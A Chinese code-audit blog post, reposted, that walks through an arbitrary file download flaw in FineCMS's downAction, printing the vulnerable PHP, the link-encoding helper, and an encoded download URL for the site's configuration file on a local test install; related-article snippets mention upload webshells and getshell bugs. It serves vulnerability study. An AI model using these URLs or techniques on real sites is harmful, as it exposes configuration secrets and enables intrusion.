代码审计之Finecms任意文件下载漏洞

最新推荐文章于 2022-08-16 01:29:17 发布
最新推荐文章于 2022-08-16 01:29:17 发布
阅读量617 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/xishaonian/p/6777611.html
版权

PS:该漏洞已被公布,只是学习。故自己跟着大佬的步伐审计。

文件地址:\controllers\ApiController.php Line 57

    public function downAction() {
        $data = fn_authcode(base64_decode($this->get('file')), 'DECODE');
        $file = isset($data['finecms']) && $data['finecms'] ? $data['finecms'] : '';
        if (empty($file)) {
            $this->msg(lang('a-mod-213'));//该方法可以不管。
        }
        if (strpos($file, ':/')) {//查找:/第一次出现的位置,如果有就执行header否则...
            //远程
            header("Location: $file");
        } else {
            //本地
            $file = str_replace('..', '', $file);//将变量file里的..替换为空
            $file = strpos($file, '/') === 0 ? APP_ROOT.$file : $file;//找$file出现在第一位,则返回根路径+$file
            if (!is_file($file)) {
                $this->msg(lang('a-mod-214') . '(#' . $file . ')');
            };
            header('Pragma: public');
            header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
            header('Cache-Control: no-store, no-cache, must-revalidate');
            header('Cache-Control: pre-check=0, post-check=0, max-age=0');
            header('Content-Transfer-Encoding: binary');
            header('Content-Encoding: none');
            header('Content-type: ' . strtolower(trim(substr(strrchr($file, '.'), 1, 10))));//strchr是从首个出现.的地方开始截断。strolower转换为小写。
            header('Content-Disposition: attachment; filename="' . basename($file) . '"');
            header('Content-length: ' . sprintf("%u", filesize($file)));//springtf:把%号替换成一个作为参数,进行传递的变量。
            readfile($file);
            exit;
        }
    }

从这个函数当中可以看出$file是可控的一个变量。

然后就需要研究下载得链接地址是如何来得。

我去测试的时候发现,需要注册了用户才可以下载。然后得到下面这个下载得url:

如下图:

 

以下这个url就是上面提示得这个url:

http://127.0.0.1/1/index.php?c=api&a=down&file=M2ZiZjF2YktnL2RDS2lEWlNybHdkSU1ITnhpSkdtM1BQU01HYXRiSjJvYUFMbmtkejBOc0pVYkt1RlFYa0FGQW9JMjBseFBMQnFmT2xyRXN3bXMva1NpQ3YzK0dja1pWM285cVkrRmFUTFNqTWlseVg1VQ

由此锁定downfile函数。

文件地址:extensions/function.php

function downfile($url) {
	return url('api/down', array('file' => str_replace('=', '', base64_encode(fn_authcode(array('finecms' => $url), 'ENCODE')))));
}

$url这个参数作为路劲。

然后我们可以那么做。本地自己构造这个函数去。

我直接在index.php页面执行了这个函数:

然后在网站的底部就直接生成了下载的URL:

如果是要下载配置文件的话就是:

index.php?c=api&a=down&file=YzlhOENnNWhPclk2cDZuMGxkZWNrcVFvSWRiNjFlME1QLzFkdTMwekRSeDdYL0lPdXU1Sm04RzgzY2UwSVRucnplR1NQZnc1dFBZNitOemlvK2F5LzNZNjlGcHJkNWJGVEE

 

转载于:https://www.cnblogs.com/xishaonian/p/6777611.html

aiquan9342
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
finecms-含有前台文件上传漏洞源码包.zip
01-04
2. **FineCMS文件上传漏洞的成因** FineCMS的文件上传功能在设计时可能存在安全审查不足,未对上传文件的类型和内容进行严格限制。这使得恶意用户有机会上传可执行的脚本文件,例如PHP、ASP、JSP等,从而在服务器上...
FineCMS 5.0.10漏洞集合
Unitue_逆流
10-12 9335
笔记地址: https://www.ichunqiu.com/course/59007 操作机: Windows xp IP:172.16.11.2目标机: Windows xp IP:172.16.12.2实验目的: 学习漏洞产生的原理 学习如何对此漏洞进行利用修复实验内容: FineCMS是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统。其5.0.10
finecms的csrf漏洞(CVE-2018-18191)
FODKING的博客
12-10 3677
原理 CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。 CSRF能够做的事情包括:以
php ccontroller,FineCMS controllers\ApiController.php 函数downAction 任意文件下载
weixin_28787725的博客
03-10 482
漏洞文件在D:\wamp\www\controllers\ApiController.php中的downAction函数```/*** 下载文件*/public function downAction() {$data = fn_authcode(base64_decode($this->get('file')), 'DECODE');$file = isset($data['finecms...
finecms aip.php漏洞,通杀FineCMS5.0.8及版本以下getshell的漏洞
weixin_32083393的博客
03-11 556
前言跟着上次的finecms,在漏洞时代又找了一个漏洞来审计。但是他改了函数里面的传参,我也弄了一阵子才搞明白这个传参原来需要加密过的参数,还有就是这个远程下载再上传,有个小问题,那篇文章没有说明,等下再系统说下。漏洞详情代码位置和代码位置\finecms\dayrui\controllers\member\Api.php代码public function down_file() {$p = ar...
finecms aip.php漏洞,FineCMS最新版5.0.8两处getshell(附python批量poc脚本)
weixin_36474966的博客
03-11 674
0x01 前言就要被**,美其名曰:比我的web安全研究和代码审计更有前途。当然是选择原谅他啦。先审计finecms去去火,找到六处漏洞,先放两处容易被发现的getshell和对应的两个python脚本0x02 getshell第一处getshell:在C:phpStudyWWWfinecmsdayruicontrollersApi.php中的data2函数,大约在第115行,有问题的代码大约在1...
小超之FineCMS模板标签生成工具 v2.0
11-28
【小超之FineCMS模板标签生成工具 v2.0】是一款专为FineCMS内容管理系统设计的辅助工具,它集合了FineCMS的众多内置标签,帮助开发者更高效地创建和管理模板。这款工具的最新版本2.0进行了界面优化,提升了用户体验...
FineCMS源代码
03-18
FineCMS(简称免费版或公益版)是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模型和会员模型,并且可以自定义字段,可面向中小型站点提供...
FineCMS公益版 v2.0.1
12-01
9. **上传管理**:`uploadfile`目录用于存放用户上传的文件,如图片、文档等,方便内容编辑和展示。 10. **易用性**:FineCMS界面简洁,操作直观,无论是后台管理还是前台展示,都致力于提供优秀的用户体验,降低...
finecms_5.4.0.zip
08-22
FineCMS 5.4.0是一款基于PHP开发的内容管理系统,专为代码审计、网站搭建以及PHP编程学习而设计。这款开源软件提供了丰富的功能和灵活的架构,使得用户能够快速地构建和管理自己的网站。本文将深入探讨FineCMS 5.4.0...
FineCMS v5.0.7
11-30
FineCMS(简称版或公益版)是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模型和会员模型,并且可以自定
技能篇丨FineCMS 5.0.10 多个漏洞详细分析
dfdhxb995397的博客
05-29 1275
今天是一篇关于技能提升的文章,文章中的CMSFineCMS,版本是5.0.10版本的几个漏洞分析,主要内容是介绍漏洞修补前和修补后的分析过程,帮助大家快速掌握该技能。 注:篇幅较长,阅读用时约7分钟。 任意文件上传漏洞 1、漏洞复现 用十六进制编辑器写一个包含一句话木马的图片,去网站注册一个账号,然后到上传头像的地方。 抓包,修改文件后缀名为.php并发包。 ...
FineCMS任意头像上传漏洞复现:文件的四次上传
Miracle_ze的博客
08-16 1443
1、第一次绕过代码没有文件再次检测,采用传包含文件夹的压缩包绕过或使用时间竞争漏洞绕过2、第二个绕过代码添加了递归对文件夹再次检测,但由于没有间竞争漏洞绕过问题。使用间竞争漏洞绕过3、第三次绕过代码进行随机命名文件无法猜文件名间竞争漏洞绕过失效,但是可以采用解压一半报错保存php文件4、第四次绕过代码对报错保留的文件进行了递归删除,但是我们可以欺骗系统将解码的文件判定为上级目录文件规避了递归在当前目录下是所有检测。其实这种漏洞补一处出现处,要从根本解决。.........
FineCMS-v5.0.1漏洞审计
m0_52920608的博客
04-27 2600
FIneCMS漏洞审计
finecms V5 会员头像任意文件上传漏洞修复代码
weixin_34088598的博客
06-12 292
前台会员头像上传任意文件,finecms v5.2及之后的版本已修复漏洞,大家可以对比一下代码确认 涉及文件:/finecms/dayrui/controllers/member/Account.php public function upload() { // 创建图片存储文件夹 $dir = SYS_UPLOAD_PATH.'/member/'.$this->uid.'/'; @dr_...
finecms存在任意文件上传漏洞复现
炙热的酷盖
08-05 2848
因为自己淋过雨,所以不想别人湿鞋 漏洞环境:finecms公益软件 finecms 存在任意文件上传:MIME验证 fofa: title=“FineCMS公益软件” && country=“CN” 首先注册一个账号yy 上传一个真实图片 3. 打开burpsuite进行抓包和改包 4. 制作图片马  准备一个正常图片1.jpep  准备一个php一句话木马1.php  将1.jpep和1.php放入相同路径下  cmd命令进入路径输入命令:copy 1.jpeg/a +1
finecms aip.php漏洞,finecmsV5.0.8 \finecms\dayrui\controllers\Api.php getshell
weixin_36303305的博客
03-11 282
漏洞在C:\phpStudy\WWW\finecms\dayrui\controllers\Api.php中的data2函数,大约在第115行,有问题的代码大约在178行```public function data2() {$data = array();// 来路认证if (defined('SYS_REFERER') && strlen(SYS_REFERER)) {$htt...
finecms aip.php漏洞,通杀FineCMS5.0.8及版本以下getshell漏洞
weixin_39600400的博客
03-11 272
在文件finecms/dayrui/controllers/member/Api.php里面有一个down_file函数.可以从远程下载文件到本地服务器.public function down_file() {$p = array();$url = explode('&', $this->input->post('url'));//经过& 分割foreach ($ur...
finecms aip.php漏洞,FineCMS漏洞挖掘
weixin_32494599的博客
03-11 549
0x00 背景最近在挖掘FineCMS源码的漏洞,发现了一些有趣的洞,斗哥计划先从配置文件写入开始分析,然后再结合存储XSS进行GetShell,本篇先分析配置文件写入的问题,下周再分析存储XSS的问题,最终通过这两类洞的组合利用GetShell,大体思路流程很简单,但是代码分析中有蛮多技巧,期待与师傅们的交流讨论。0x01 漏洞审计1x00 相关环境源码信息:FineCMS v5.3.0 bul...
finecms逻辑漏洞
最新发布
06-06
FineCMS是一款开源的内容管理系统,它的逻辑漏洞可能会导致安全问题。以下是FineCMS常见的逻辑漏洞: 1.未经身份验证的访问:FineCMS的某些页面没有进行身份验证,可能会通过直接访问URL来绕过身份验证机制,获取敏感信息或执行特权操作。 2.输入验证不足:FineCMS的某些输入字段没有进行足够的验证,可能会导致SQL注入、跨站点脚本攻击等安全问题。 3.弱密码策略:FineCMS的默认密码策略较弱,可能会导致用户密码被猜测或破解,进而导致系统被攻击。 4.文件上传漏洞FineCMS的文件上传功能可能存在漏洞,攻击者可以上传恶意文件,导致系统被攻击。 5.逻辑错误:FineCMS的某些功能可能存在逻辑错误,攻击者可以通过利用这些错误来执行特权操作或获取敏感信息。 总之,为了减少FineCMS的逻辑漏洞,建议及时更新最新版本,加强安全策略,进行安全测试和漏洞扫描。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值